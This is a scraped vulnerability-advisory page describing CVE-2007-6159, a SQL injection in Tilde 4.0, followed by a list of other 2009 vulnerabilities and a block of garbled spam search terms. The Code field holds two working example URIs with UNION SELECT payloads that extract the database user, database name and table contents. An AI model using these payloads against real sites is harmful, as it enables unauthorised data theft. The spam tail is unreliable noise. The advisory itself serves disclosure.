exploits , vulnerabilities , articles , Tilde Aarstal Parameter SQL Injection Vulnerability

Title	Tilde Aarstal Parameter SQL Injection Vulnerability
Published	2007-11-26-12:00AM
Updated	2007-12-18-08:06PM
Class	Input Validation Error
CVE	CVE-2007-6159
Remote	Yes
Local	No
Credit	KiNgOfThEwOrLd is credited with the discovery of this vulnerability.
Vulnerable	Tilde Tilde 4.0
Not Vulnerable
Code	Attackers can use a browser to exploit this issue.The following example URIs are available:http://www.example.com/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999//union//select/*/1,2,user(),database(),5/ http://www.example.com/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999//union//select//1,2,[row_name],4,[row_name]//from/*/[table_name]/
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 ReVou Comment Field HTML Injection Vulnerability
2009-12-18 Adobe Flash Media Server Resource Exhaustion Remote Denial of Service Vulnerability
2009-12-18 Centreon Authentication Mechanism Security Bypass Vulnerability
2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 02:34:16 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
drupa mre+map news for c Videoscort maxcpm.inf julia chan news for c SE4XTELGU lo726l sex ladys puctr Hot sexi p WWWSEXY.CO qqmove.cn news for C hotdy.com tyra www.xayf.c Www.sexygi ad subtrac guest book 200 /compo SEXEMOVES www sex @ php+4.3.1+ news+for+c Phorum 3.2 collgesex 200 /compo Really gre IceWarp We mambo Remo 2.6.14. misca.5d6d 18to19.com Trisha+hot thirisa.se Photo sexe www .schoo cmd= OpenSSH 3. SGSW-2402 www.wholin girls wet com_flyspr Www.Indian t672t phpMyAdmin www.sexy l Www.sex5g.